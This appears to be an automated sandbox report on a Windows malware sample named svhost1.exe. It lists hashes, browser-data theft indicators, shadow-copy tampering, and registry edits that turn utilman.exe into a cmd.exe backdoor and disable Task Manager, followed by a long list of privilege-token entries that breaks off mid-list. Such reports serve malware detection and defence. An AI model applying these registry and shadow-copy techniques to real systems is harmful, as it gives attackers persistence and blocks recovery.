Analysis
-
max time kernel
66s -
max time network
48s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
09/05/2020, 18:48
Static task
static1
Behavioral task
behavioral1
Sample
svhost1.exe
Resource
win7v200430
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
svhost1.exe
Resource
win10v200430
0 signatures
0 seconds
General
-
Target
svhost1.exe
-
Size
2.8MB
-
MD5
0527539f8c9af38ea8c36e9d2be595cd
-
SHA1
a9d38a3b10c1d3dbf5eb00024303877e3c84cdab
-
SHA256
247ddce4c369810b27385acb97298a107ac440b70d23f047e20224dd6e68e536
-
SHA512
00e01f1668c09f98643312e15044a8dc4ef38b72bb08106bd967af6f130ebaca8899e3bf22b143db49a0daf42db690b8890d10e3455804e817647e6f977242c4
Score
9/10
Malware Config
Signatures
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of WriteProcessMemory 94 IoCs
-
Runs net.exe
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process
3180 vssadmin.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process
868 powershell.exe
868 powershell.exe
868 powershell.exe
2092 powershell.exe
2092 powershell.exe
2092 powershell.exe
-
Sets file execution options in registry 2 TTPs 4 IoCs
description ioc Process
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe reg.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "%windir%\\system32\\cmd.exe" reg.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe reg.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "Hotkey Disabled" reg.exe
-
Drops desktop.ini file(s) 3 IoCs
description ioc Process
File opened for modification C:\Program Files\desktop.ini svhost1.exe
File opened for modification C:\Program Files (x86)\desktop.ini svhost1.exe
File opened for modification C:\$Recycle.Bin\S-1-5-21-1231583446-2617009595-2137880041-1000\desktop.ini svhost1.exe
-
Suspicious use of AdjustPrivilegeToken 1643 IoCs
Token: 33 2252 WMIC.exe Token: 34 2252 WMIC.exe Token: 35 2252 WMIC.exe Token: 36 2252 WMIC.exe Token: SeIncreaseQuotaPrivilege 2252 WMIC.exe Token: SeSecurityPrivilege 2252 WMIC.exe Token: SeTakeOwnershipPrivilege 2252 WMIC.exe Token: SeLoadDriverPrivilege 2252 WMIC.exe Token: SeSystemProfilePrivilege 2252 WMIC.exe Token: SeSystemtimePrivilege 2252 WMIC.exe Token: SeProfSingleProcessPrivilege 2252 WMIC.exe Token: SeIncBasePriorityPrivilege 2252 WMIC.exe Token: SeCreatePagefilePrivilege 2252 WMIC.exe Token: SeBackupPrivilege 2252 WMIC.exe Token: SeRestorePrivilege 2252 WMIC.exe Token: SeShutdownPrivilege 2252 WMIC.exe Token: SeDebugPrivilege 2252 WMIC.exe Token: SeSystemEnvironmentPrivilege 2252 WMIC.exe Token: SeRemoteShutdownPrivilege 2252 WMIC.exe Token: SeUndockPrivilege 2252 WMIC.exe Token: SeManageVolumePrivilege 2252 WMIC.exe Token: 33 2252 WMIC.exe Token: 34 2252 WMIC.exe Token: 35 2252 WMIC.exe Token: 36 2252 WMIC.exe Token: SeIncreaseQuotaPrivilege 3052 WMIC.exe Token: SeSecurityPrivilege 3052 WMIC.exe Token: SeTakeOwnershipPrivilege 3052 WMIC.exe Token: SeLoadDriverPrivilege 3052 WMIC.exe Token: SeSystemProfilePrivilege 3052 WMIC.exe Token: SeSystemtimePrivilege 3052 WMIC.exe Token: SeProfSingleProcessPrivilege 3052 WMIC.exe Token: SeIncBasePriorityPrivilege 3052 WMIC.exe Token: SeCreatePagefilePrivilege 3052 WMIC.exe Token: SeBackupPrivilege 3052 WMIC.exe Token: SeRestorePrivilege 3052 WMIC.exe Token: SeShutdownPrivilege 3052 WMIC.exe Token: SeDebugPrivilege 3052 WMIC.exe Token: SeSystemEnvironmentPrivilege 3052 WMIC.exe Token: SeRemoteShutdownPrivilege 3052 WMIC.exe Token: SeUndockPrivilege 3052 WMIC.exe Token: SeManageVolumePrivilege 3052 WMIC.exe Token: 33 3052 WMIC.exe Token: 34 3052 WMIC.exe Token: 35 3052 WMIC.exe Token: 36 3052 WMIC.exe Token: SeIncreaseQuotaPrivilege 3052 WMIC.exe Token: SeSecurityPrivilege 3052 WMIC.exe Token: SeTakeOwnershipPrivilege 3052 WMIC.exe Token: SeLoadDriverPrivilege 3052 WMIC.exe Token: SeSystemProfilePrivilege 3052 
WMIC.exe Token: SeSystemtimePrivilege 3052 WMIC.exe Token: SeProfSingleProcessPrivilege 3052 WMIC.exe Token: SeIncBasePriorityPrivilege 3052 WMIC.exe Token: SeCreatePagefilePrivilege 3052 WMIC.exe Token: SeBackupPrivilege 3052 WMIC.exe Token: SeRestorePrivilege 3052 WMIC.exe Token: SeShutdownPrivilege 3052 WMIC.exe Token: SeDebugPrivilege 3052 WMIC.exe Token: SeSystemEnvironmentPrivilege 3052 WMIC.exe Token: SeRemoteShutdownPrivilege 3052 WMIC.exe Token: SeUndockPrivilege 3052 WMIC.exe Token: SeManageVolumePrivilege 3052 WMIC.exe Token: 33 3052 WMIC.exe Token: 34 3052 WMIC.exe Token: 35 3052 WMIC.exe Token: 36 3052 WMIC.exe Token: SeIncreaseQuotaPrivilege 508 WMIC.exe Token: SeSecurityPrivilege 508 WMIC.exe Token: SeTakeOwnershipPrivilege 508 WMIC.exe Token: SeLoadDriverPrivilege 508 WMIC.exe Token: SeSystemProfilePrivilege 508 WMIC.exe Token: SeSystemtimePrivilege 508 WMIC.exe Token: SeProfSingleProcessPrivilege 508 WMIC.exe Token: SeIncBasePriorityPrivilege 508 WMIC.exe Token: SeCreatePagefilePrivilege 508 WMIC.exe Token: SeBackupPrivilege 508 WMIC.exe Token: SeRestorePrivilege 508 WMIC.exe Token: SeShutdownPrivilege 508 WMIC.exe Token: SeDebugPrivilege 508 WMIC.exe Token: SeSystemEnvironmentPrivilege 508 WMIC.exe Token: SeRemoteShutdownPrivilege 508 WMIC.exe Token: SeUndockPrivilege 508 WMIC.exe Token: SeManageVolumePrivilege 508 WMIC.exe Token: 33 508 WMIC.exe Token: 34 508 WMIC.exe Token: 35 508 WMIC.exe Token: 36 508 WMIC.exe Token: SeIncreaseQuotaPrivilege 508 WMIC.exe Token: SeSecurityPrivilege 508 WMIC.exe Token: SeTakeOwnershipPrivilege 508 WMIC.exe Token: SeLoadDriverPrivilege 508 WMIC.exe Token: SeSystemProfilePrivilege 508 WMIC.exe Token: SeSystemtimePrivilege 508 WMIC.exe Token: SeProfSingleProcessPrivilege 508 WMIC.exe Token: SeIncBasePriorityPrivilege 508 WMIC.exe Token: SeCreatePagefilePrivilege 508 WMIC.exe Token: SeBackupPrivilege 508 WMIC.exe Token: SeRestorePrivilege 508 WMIC.exe Token: SeShutdownPrivilege 508 WMIC.exe Token: SeDebugPrivilege 
508 WMIC.exe Token: SeSystemEnvironmentPrivilege 508 WMIC.exe Token: SeRemoteShutdownPrivilege 508 WMIC.exe Token: SeUndockPrivilege 508 WMIC.exe Token: SeManageVolumePrivilege 508 WMIC.exe Token: 33 508 WMIC.exe Token: 34 508 WMIC.exe Token: 35 508 WMIC.exe Token: 36 508 WMIC.exe Token: SeIncreaseQuotaPrivilege 3996 WMIC.exe Token: SeSecurityPrivilege 3996 WMIC.exe Token: SeTakeOwnershipPrivilege 3996 WMIC.exe Token: SeLoadDriverPrivilege 3996 WMIC.exe Token: SeSystemProfilePrivilege 3996 WMIC.exe Token: SeSystemtimePrivilege 3996 WMIC.exe Token: SeProfSingleProcessPrivilege 3996 WMIC.exe Token: SeIncBasePriorityPrivilege 3996 WMIC.exe Token: SeCreatePagefilePrivilege 3996 WMIC.exe Token: SeBackupPrivilege 3996 WMIC.exe Token: SeRestorePrivilege 3996 WMIC.exe Token: SeShutdownPrivilege 3996 WMIC.exe Token: SeDebugPrivilege 3996 WMIC.exe Token: SeSystemEnvironmentPrivilege 3996 WMIC.exe Token: SeRemoteShutdownPrivilege 3996 WMIC.exe Token: SeUndockPrivilege 3996 WMIC.exe Token: SeManageVolumePrivilege 3996 WMIC.exe Token: 33 3996 WMIC.exe Token: 34 3996 WMIC.exe Token: 35 3996 WMIC.exe Token: 36 3996 WMIC.exe Token: SeIncreaseQuotaPrivilege 3996 WMIC.exe Token: SeSecurityPrivilege 3996 WMIC.exe Token: SeTakeOwnershipPrivilege 3996 WMIC.exe Token: SeLoadDriverPrivilege 3996 WMIC.exe Token: SeSystemProfilePrivilege 3996 WMIC.exe Token: SeSystemtimePrivilege 3996 WMIC.exe Token: SeProfSingleProcessPrivilege 3996 WMIC.exe Token: SeIncBasePriorityPrivilege 3996 WMIC.exe Token: SeCreatePagefilePrivilege 3996 WMIC.exe Token: SeBackupPrivilege 3996 WMIC.exe Token: SeRestorePrivilege 3996 WMIC.exe Token: SeShutdownPrivilege 3996 WMIC.exe Token: SeDebugPrivilege 3996 WMIC.exe Token: SeSystemEnvironmentPrivilege 3996 WMIC.exe Token: SeRemoteShutdownPrivilege 3996 WMIC.exe Token: SeUndockPrivilege 3996 WMIC.exe Token: SeManageVolumePrivilege 3996 WMIC.exe Token: 33 3996 WMIC.exe Token: 34 3996 WMIC.exe Token: 35 3996 WMIC.exe Token: 36 3996 WMIC.exe Token: 
SeIncreaseQuotaPrivilege 3992 WMIC.exe Token: SeSecurityPrivilege 3992 WMIC.exe Token: SeTakeOwnershipPrivilege 3992 WMIC.exe Token: SeLoadDriverPrivilege 3992 WMIC.exe Token: SeSystemProfilePrivilege 3992 WMIC.exe Token: SeSystemtimePrivilege 3992 WMIC.exe Token: SeProfSingleProcessPrivilege 3992 WMIC.exe Token: SeIncBasePriorityPrivilege 3992 WMIC.exe Token: SeCreatePagefilePrivilege 3992 WMIC.exe Token: SeBackupPrivilege 3992 WMIC.exe Token: SeRestorePrivilege 3992 WMIC.exe Token: SeShutdownPrivilege 3992 WMIC.exe Token: SeDebugPrivilege 3992 WMIC.exe Token: SeSystemEnvironmentPrivilege 3992 WMIC.exe Token: SeRemoteShutdownPrivilege 3992 WMIC.exe Token: SeUndockPrivilege 3992 WMIC.exe Token: SeManageVolumePrivilege 3992 WMIC.exe Token: 33 3992 WMIC.exe Token: 34 3992 WMIC.exe Token: 35 3992 WMIC.exe Token: 36 3992 WMIC.exe Token: SeIncreaseQuotaPrivilege 3992 WMIC.exe Token: SeSecurityPrivilege 3992 WMIC.exe Token: SeTakeOwnershipPrivilege 3992 WMIC.exe Token: SeLoadDriverPrivilege 3992 WMIC.exe Token: SeSystemProfilePrivilege 3992 WMIC.exe Token: SeSystemtimePrivilege 3992 WMIC.exe Token: SeProfSingleProcessPrivilege 3992 WMIC.exe Token: SeIncBasePriorityPrivilege 3992 WMIC.exe Token: SeCreatePagefilePrivilege 3992 WMIC.exe Token: SeBackupPrivilege 3992 WMIC.exe Token: SeRestorePrivilege 3992 WMIC.exe Token: SeShutdownPrivilege 3992 WMIC.exe Token: SeDebugPrivilege 3992 WMIC.exe Token: SeSystemEnvironmentPrivilege 3992 WMIC.exe Token: SeRemoteShutdownPrivilege 3992 WMIC.exe Token: SeUndockPrivilege 3992 WMIC.exe Token: SeManageVolumePrivilege 3992 WMIC.exe Token: 33 3992 WMIC.exe Token: 34 3992 WMIC.exe Token: 35 3992 WMIC.exe Token: 36 3992 WMIC.exe Token: SeIncreaseQuotaPrivilege 2220 WMIC.exe Token: SeSecurityPrivilege 2220 WMIC.exe Token: SeTakeOwnershipPrivilege 2220 WMIC.exe Token: SeLoadDriverPrivilege 2220 WMIC.exe Token: SeSystemProfilePrivilege 2220 WMIC.exe Token: SeSystemtimePrivilege 2220 WMIC.exe Token: SeProfSingleProcessPrivilege 2220 WMIC.exe 
Token: SeIncBasePriorityPrivilege 2220 WMIC.exe Token: SeCreatePagefilePrivilege 2220 WMIC.exe Token: SeBackupPrivilege 2220 WMIC.exe Token: SeRestorePrivilege 2220 WMIC.exe Token: SeShutdownPrivilege 2220 WMIC.exe Token: SeDebugPrivilege 2220 WMIC.exe Token: SeSystemEnvironmentPrivilege 2220 WMIC.exe Token: SeRemoteShutdownPrivilege 2220 WMIC.exe Token: SeUndockPrivilege 2220 WMIC.exe Token: SeManageVolumePrivilege 2220 WMIC.exe Token: 33 2220 WMIC.exe Token: 34 2220 WMIC.exe Token: 35 2220 WMIC.exe Token: 36 2220 WMIC.exe Token: SeIncreaseQuotaPrivilege 2220 WMIC.exe Token: SeSecurityPrivilege 2220 WMIC.exe Token: SeTakeOwnershipPrivilege 2220 WMIC.exe Token: SeLoadDriverPrivilege 2220 WMIC.exe Token: SeSystemProfilePrivilege 2220 WMIC.exe Token: SeSystemtimePrivilege 2220 WMIC.exe Token: SeProfSingleProcessPrivilege 2220 WMIC.exe Token: SeIncBasePriorityPrivilege 2220 WMIC.exe Token: SeCreatePagefilePrivilege 2220 WMIC.exe Token: SeBackupPrivilege 2220 WMIC.exe Token: SeRestorePrivilege 2220 WMIC.exe Token: SeShutdownPrivilege 2220 WMIC.exe Token: SeDebugPrivilege 2220 WMIC.exe Token: SeSystemEnvironmentPrivilege 2220 WMIC.exe Token: SeRemoteShutdownPrivilege 2220 WMIC.exe Token: SeUndockPrivilege 2220 WMIC.exe Token: SeManageVolumePrivilege 2220 WMIC.exe Token: 33 2220 WMIC.exe Token: 34 2220 WMIC.exe Token: 35 2220 WMIC.exe Token: 36 2220 WMIC.exe Token: SeIncreaseQuotaPrivilege 992 WMIC.exe Token: SeSecurityPrivilege 992 WMIC.exe Token: SeTakeOwnershipPrivilege 992 WMIC.exe Token: SeLoadDriverPrivilege 992 WMIC.exe Token: SeSystemProfilePrivilege 992 WMIC.exe Token: SeSystemtimePrivilege 992 WMIC.exe Token: SeProfSingleProcessPrivilege 992 WMIC.exe Token: SeIncBasePriorityPrivilege 992 WMIC.exe Token: SeCreatePagefilePrivilege 992 WMIC.exe Token: SeBackupPrivilege 992 WMIC.exe Token: SeRestorePrivilege 992 WMIC.exe Token: SeShutdownPrivilege 992 WMIC.exe Token: SeDebugPrivilege 992 WMIC.exe Token: SeSystemEnvironmentPrivilege 992 WMIC.exe Token: 
SeRemoteShutdownPrivilege 992 WMIC.exe Token: SeUndockPrivilege 992 WMIC.exe Token: SeManageVolumePrivilege 992 WMIC.exe Token: 33 992 WMIC.exe Token: 34 992 WMIC.exe Token: 35 992 WMIC.exe Token: 36 992 WMIC.exe Token: SeIncreaseQuotaPrivilege 992 WMIC.exe Token: SeSecurityPrivilege 992 WMIC.exe Token: SeTakeOwnershipPrivilege 992 WMIC.exe Token: SeLoadDriverPrivilege 992 WMIC.exe Token: SeSystemProfilePrivilege 992 WMIC.exe Token: SeSystemtimePrivilege 992 WMIC.exe Token: SeProfSingleProcessPrivilege 992 WMIC.exe Token: SeIncBasePriorityPrivilege 992 WMIC.exe Token: SeCreatePagefilePrivilege 992 WMIC.exe Token: SeBackupPrivilege 992 WMIC.exe Token: SeRestorePrivilege 992 WMIC.exe Token: SeShutdownPrivilege 992 WMIC.exe Token: SeDebugPrivilege 992 WMIC.exe Token: SeSystemEnvironmentPrivilege 992 WMIC.exe Token: SeRemoteShutdownPrivilege 992 WMIC.exe Token: SeUndockPrivilege 992 WMIC.exe Token: SeManageVolumePrivilege 992 WMIC.exe Token: 33 992 WMIC.exe Token: 34 992 WMIC.exe Token: 35 992 WMIC.exe Token: 36 992 WMIC.exe Token: SeIncreaseQuotaPrivilege 1060 WMIC.exe Token: SeSecurityPrivilege 1060 WMIC.exe Token: SeTakeOwnershipPrivilege 1060 WMIC.exe Token: SeLoadDriverPrivilege 1060 WMIC.exe Token: SeSystemProfilePrivilege 1060 WMIC.exe Token: SeSystemtimePrivilege 1060 WMIC.exe Token: SeProfSingleProcessPrivilege 1060 WMIC.exe Token: SeIncBasePriorityPrivilege 1060 WMIC.exe Token: SeCreatePagefilePrivilege 1060 WMIC.exe Token: SeBackupPrivilege 1060 WMIC.exe Token: SeRestorePrivilege 1060 WMIC.exe Token: SeShutdownPrivilege 1060 WMIC.exe Token: SeDebugPrivilege 1060 WMIC.exe Token: SeSystemEnvironmentPrivilege 1060 WMIC.exe Token: SeRemoteShutdownPrivilege 1060 WMIC.exe Token: SeUndockPrivilege 1060 WMIC.exe Token: SeManageVolumePrivilege 1060 WMIC.exe Token: 33 1060 WMIC.exe Token: 34 1060 WMIC.exe Token: 35 1060 WMIC.exe Token: 36 1060 WMIC.exe Token: SeIncreaseQuotaPrivilege 1060 WMIC.exe Token: SeSecurityPrivilege 1060 WMIC.exe Token: 
SeTakeOwnershipPrivilege 1060 WMIC.exe Token: SeLoadDriverPrivilege 1060 WMIC.exe Token: SeSystemProfilePrivilege 1060 WMIC.exe Token: SeSystemtimePrivilege 1060 WMIC.exe Token: SeProfSingleProcessPrivilege 1060 WMIC.exe Token: SeIncBasePriorityPrivilege 1060 WMIC.exe Token: SeCreatePagefilePrivilege 1060 WMIC.exe Token: SeBackupPrivilege 1060 WMIC.exe Token: SeRestorePrivilege 1060 WMIC.exe Token: SeShutdownPrivilege 1060 WMIC.exe Token: SeDebugPrivilege 1060 WMIC.exe Token: SeSystemEnvironmentPrivilege 1060 WMIC.exe Token: SeRemoteShutdownPrivilege 1060 WMIC.exe Token: SeUndockPrivilege 1060 WMIC.exe Token: SeManageVolumePrivilege 1060 WMIC.exe Token: 33 1060 WMIC.exe Token: 34 1060 WMIC.exe Token: 35 1060 WMIC.exe Token: 36 1060 WMIC.exe Token: SeIncreaseQuotaPrivilege 1800 WMIC.exe Token: SeSecurityPrivilege 1800 WMIC.exe Token: SeTakeOwnershipPrivilege 1800 WMIC.exe Token: SeLoadDriverPrivilege 1800 WMIC.exe Token: SeSystemProfilePrivilege 1800 WMIC.exe Token: SeSystemtimePrivilege 1800 WMIC.exe Token: SeProfSingleProcessPrivilege 1800 WMIC.exe Token: SeIncBasePriorityPrivilege 1800 WMIC.exe Token: SeCreatePagefilePrivilege 1800 WMIC.exe Token: SeBackupPrivilege 1800 WMIC.exe Token: SeRestorePrivilege 1800 WMIC.exe Token: SeShutdownPrivilege 1800 WMIC.exe Token: SeDebugPrivilege 1800 WMIC.exe Token: SeSystemEnvironmentPrivilege 1800 WMIC.exe Token: SeRemoteShutdownPrivilege 1800 WMIC.exe Token: SeUndockPrivilege 1800 WMIC.exe Token: SeManageVolumePrivilege 1800 WMIC.exe Token: 33 1800 WMIC.exe Token: 34 1800 WMIC.exe Token: 35 1800 WMIC.exe Token: 36 1800 WMIC.exe Token: SeIncreaseQuotaPrivilege 1800 WMIC.exe Token: SeSecurityPrivilege 1800 WMIC.exe Token: SeTakeOwnershipPrivilege 1800 WMIC.exe Token: SeLoadDriverPrivilege 1800 WMIC.exe Token: SeSystemProfilePrivilege 1800 WMIC.exe Token: SeSystemtimePrivilege 1800 WMIC.exe Token: SeProfSingleProcessPrivilege 1800 WMIC.exe Token: SeIncBasePriorityPrivilege 1800 WMIC.exe Token: SeCreatePagefilePrivilege 1800 
WMIC.exe Token: SeBackupPrivilege 1800 WMIC.exe Token: SeRestorePrivilege 1800 WMIC.exe Token: SeShutdownPrivilege 1800 WMIC.exe Token: SeDebugPrivilege 1800 WMIC.exe Token: SeSystemEnvironmentPrivilege 1800 WMIC.exe Token: SeRemoteShutdownPrivilege 1800 WMIC.exe Token: SeUndockPrivilege 1800 WMIC.exe Token: SeManageVolumePrivilege 1800 WMIC.exe Token: 33 1800 WMIC.exe Token: 34 1800 WMIC.exe Token: 35 1800 WMIC.exe Token: 36 1800 WMIC.exe Token: SeIncreaseQuotaPrivilege 1008 WMIC.exe Token: SeSecurityPrivilege 1008 WMIC.exe Token: SeTakeOwnershipPrivilege 1008 WMIC.exe Token: SeLoadDriverPrivilege 1008 WMIC.exe Token: SeSystemProfilePrivilege 1008 WMIC.exe Token: SeSystemtimePrivilege 1008 WMIC.exe Token: SeProfSingleProcessPrivilege 1008 WMIC.exe Token: SeIncBasePriorityPrivilege 1008 WMIC.exe Token: SeCreatePagefilePrivilege 1008 WMIC.exe Token: SeBackupPrivilege 1008 WMIC.exe Token: SeRestorePrivilege 1008 WMIC.exe Token: SeShutdownPrivilege 1008 WMIC.exe Token: SeDebugPrivilege 1008 WMIC.exe Token: SeSystemEnvironmentPrivilege 1008 WMIC.exe Token: SeRemoteShutdownPrivilege 1008 WMIC.exe Token: SeUndockPrivilege 1008 WMIC.exe Token: SeManageVolumePrivilege 1008 WMIC.exe Token: 33 1008 WMIC.exe Token: 34 1008 WMIC.exe Token: 35 1008 WMIC.exe Token: 36 1008 WMIC.exe Token: SeIncreaseQuotaPrivilege 1008 WMIC.exe Token: SeSecurityPrivilege 1008 WMIC.exe Token: SeTakeOwnershipPrivilege 1008 WMIC.exe Token: SeLoadDriverPrivilege 1008 WMIC.exe Token: SeSystemProfilePrivilege 1008 WMIC.exe Token: SeSystemtimePrivilege 1008 WMIC.exe Token: SeProfSingleProcessPrivilege 1008 WMIC.exe Token: SeIncBasePriorityPrivilege 1008 WMIC.exe Token: SeCreatePagefilePrivilege 1008 WMIC.exe Token: SeBackupPrivilege 1008 WMIC.exe Token: SeRestorePrivilege 1008 WMIC.exe Token: SeShutdownPrivilege 1008 WMIC.exe Token: SeDebugPrivilege 1008 WMIC.exe Token: SeSystemEnvironmentPrivilege 1008 WMIC.exe Token: SeRemoteShutdownPrivilege 1008 WMIC.exe Token: SeUndockPrivilege 1008 WMIC.exe Token: 
SeManageVolumePrivilege 1008 WMIC.exe Token: 33 1008 WMIC.exe Token: 34 1008 WMIC.exe Token: 35 1008 WMIC.exe Token: 36 1008 WMIC.exe Token: SeIncreaseQuotaPrivilege 268 WMIC.exe Token: SeSecurityPrivilege 268 WMIC.exe Token: SeTakeOwnershipPrivilege 268 WMIC.exe Token: SeLoadDriverPrivilege 268 WMIC.exe Token: SeSystemProfilePrivilege 268 WMIC.exe Token: SeSystemtimePrivilege 268 WMIC.exe Token: SeProfSingleProcessPrivilege 268 WMIC.exe Token: SeIncBasePriorityPrivilege 268 WMIC.exe Token: SeCreatePagefilePrivilege 268 WMIC.exe Token: SeBackupPrivilege 268 WMIC.exe Token: SeRestorePrivilege 268 WMIC.exe Token: SeShutdownPrivilege 268 WMIC.exe Token: SeDebugPrivilege 268 WMIC.exe Token: SeSystemEnvironmentPrivilege 268 WMIC.exe Token: SeRemoteShutdownPrivilege 268 WMIC.exe Token: SeUndockPrivilege 268 WMIC.exe Token: SeManageVolumePrivilege 268 WMIC.exe Token: 33 268 WMIC.exe Token: 34 268 WMIC.exe Token: 35 268 WMIC.exe Token: 36 268 WMIC.exe Token: SeIncreaseQuotaPrivilege 268 WMIC.exe Token: SeSecurityPrivilege 268 WMIC.exe Token: SeTakeOwnershipPrivilege 268 WMIC.exe Token: SeLoadDriverPrivilege 268 WMIC.exe Token: SeSystemProfilePrivilege 268 WMIC.exe Token: SeSystemtimePrivilege 268 WMIC.exe Token: SeProfSingleProcessPrivilege 268 WMIC.exe Token: SeIncBasePriorityPrivilege 268 WMIC.exe Token: SeCreatePagefilePrivilege 268 WMIC.exe Token: SeBackupPrivilege 268 WMIC.exe Token: SeRestorePrivilege 268 WMIC.exe Token: SeShutdownPrivilege 268 WMIC.exe Token: SeDebugPrivilege 268 WMIC.exe Token: SeSystemEnvironmentPrivilege 268 WMIC.exe Token: SeRemoteShutdownPrivilege 268 WMIC.exe Token: SeUndockPrivilege 268 WMIC.exe Token: SeManageVolumePrivilege 268 WMIC.exe Token: 33 268 WMIC.exe Token: 34 268 WMIC.exe Token: 35 268 WMIC.exe Token: 36 268 WMIC.exe Token: SeIncreaseQuotaPrivilege 3848 WMIC.exe Token: SeSecurityPrivilege 3848 WMIC.exe Token: SeTakeOwnershipPrivilege 3848 WMIC.exe Token: SeLoadDriverPrivilege 3848 WMIC.exe Token: SeSystemProfilePrivilege 3848 
WMIC.exe Token: SeSystemtimePrivilege 3848 WMIC.exe Token: SeProfSingleProcessPrivilege 3848 WMIC.exe Token: SeIncBasePriorityPrivilege 3848 WMIC.exe Token: SeCreatePagefilePrivilege 3848 WMIC.exe Token: SeBackupPrivilege 3848 WMIC.exe Token: SeRestorePrivilege 3848 WMIC.exe Token: SeShutdownPrivilege 3848 WMIC.exe Token: SeDebugPrivilege 3848 WMIC.exe Token: SeSystemEnvironmentPrivilege 3848 WMIC.exe Token: SeRemoteShutdownPrivilege 3848 WMIC.exe Token: SeUndockPrivilege 3848 WMIC.exe Token: SeManageVolumePrivilege 3848 WMIC.exe Token: 33 3848 WMIC.exe Token: 34 3848 WMIC.exe Token: 35 3848 WMIC.exe Token: 36 3848 WMIC.exe Token: SeIncreaseQuotaPrivilege 3848 WMIC.exe Token: SeSecurityPrivilege 3848 WMIC.exe Token: SeTakeOwnershipPrivilege 3848 WMIC.exe Token: SeLoadDriverPrivilege 3848 WMIC.exe Token: SeSystemProfilePrivilege 3848 WMIC.exe Token: SeSystemtimePrivilege 3848 WMIC.exe Token: SeProfSingleProcessPrivilege 3848 WMIC.exe Token: SeIncBasePriorityPrivilege 3848 WMIC.exe Token: SeCreatePagefilePrivilege 3848 WMIC.exe Token: SeBackupPrivilege 3848 WMIC.exe Token: SeRestorePrivilege 3848 WMIC.exe Token: SeShutdownPrivilege 3848 WMIC.exe Token: SeDebugPrivilege 3848 WMIC.exe Token: SeSystemEnvironmentPrivilege 3848 WMIC.exe Token: SeRemoteShutdownPrivilege 3848 WMIC.exe Token: SeUndockPrivilege 3848 WMIC.exe Token: SeManageVolumePrivilege 3848 WMIC.exe Token: 33 3848 WMIC.exe Token: 34 3848 WMIC.exe Token: 35 3848 WMIC.exe Token: 36 3848 WMIC.exe Token: SeIncreaseQuotaPrivilege 1476 WMIC.exe Token: SeSecurityPrivilege 1476 WMIC.exe Token: SeTakeOwnershipPrivilege 1476 WMIC.exe Token: SeLoadDriverPrivilege 1476 WMIC.exe Token: SeSystemProfilePrivilege 1476 WMIC.exe Token: SeSystemtimePrivilege 1476 WMIC.exe Token: SeProfSingleProcessPrivilege 1476 WMIC.exe Token: SeIncBasePriorityPrivilege 1476 WMIC.exe Token: SeCreatePagefilePrivilege 1476 WMIC.exe Token: SeBackupPrivilege 1476 WMIC.exe Token: SeRestorePrivilege 1476 WMIC.exe Token: SeShutdownPrivilege 1476 
WMIC.exe Token: SeDebugPrivilege 1476 WMIC.exe Token: SeSystemEnvironmentPrivilege 1476 WMIC.exe Token: SeRemoteShutdownPrivilege 1476 WMIC.exe Token: SeUndockPrivilege 1476 WMIC.exe Token: SeManageVolumePrivilege 1476 WMIC.exe Token: 33 1476 WMIC.exe Token: 34 1476 WMIC.exe Token: 35 1476 WMIC.exe Token: 36 1476 WMIC.exe Token: SeIncreaseQuotaPrivilege 1476 WMIC.exe Token: SeSecurityPrivilege 1476 WMIC.exe Token: SeTakeOwnershipPrivilege 1476 WMIC.exe Token: SeLoadDriverPrivilege 1476 WMIC.exe Token: SeSystemProfilePrivilege 1476 WMIC.exe Token: SeSystemtimePrivilege 1476 WMIC.exe Token: SeProfSingleProcessPrivilege 1476 WMIC.exe Token: SeIncBasePriorityPrivilege 1476 WMIC.exe Token: SeCreatePagefilePrivilege 1476 WMIC.exe Token: SeBackupPrivilege 1476 WMIC.exe Token: SeRestorePrivilege 1476 WMIC.exe Token: SeShutdownPrivilege 1476 WMIC.exe Token: SeDebugPrivilege 1476 WMIC.exe Token: SeSystemEnvironmentPrivilege 1476 WMIC.exe Token: SeRemoteShutdownPrivilege 1476 WMIC.exe Token: SeUndockPrivilege 1476 WMIC.exe Token: SeManageVolumePrivilege 1476 WMIC.exe Token: 33 1476 WMIC.exe Token: 34 1476 WMIC.exe Token: 35 1476 WMIC.exe Token: 36 1476 WMIC.exe Token: SeIncreaseQuotaPrivilege 1872 WMIC.exe Token: SeSecurityPrivilege 1872 WMIC.exe Token: SeTakeOwnershipPrivilege 1872 WMIC.exe Token: SeLoadDriverPrivilege 1872 WMIC.exe Token: SeSystemProfilePrivilege 1872 WMIC.exe Token: SeSystemtimePrivilege 1872 WMIC.exe Token: SeProfSingleProcessPrivilege 1872 WMIC.exe Token: SeIncBasePriorityPrivilege 1872 WMIC.exe Token: SeCreatePagefilePrivilege 1872 WMIC.exe Token: SeBackupPrivilege 1872 WMIC.exe Token: SeRestorePrivilege 1872 WMIC.exe Token: SeShutdownPrivilege 1872 WMIC.exe Token: SeDebugPrivilege 1872 WMIC.exe Token: SeSystemEnvironmentPrivilege 1872 WMIC.exe Token: SeRemoteShutdownPrivilege 1872 WMIC.exe Token: SeUndockPrivilege 1872 WMIC.exe Token: SeManageVolumePrivilege 1872 WMIC.exe Token: 33 1872 WMIC.exe Token: 34 1872 WMIC.exe Token: 35 1872 WMIC.exe Token: 36 
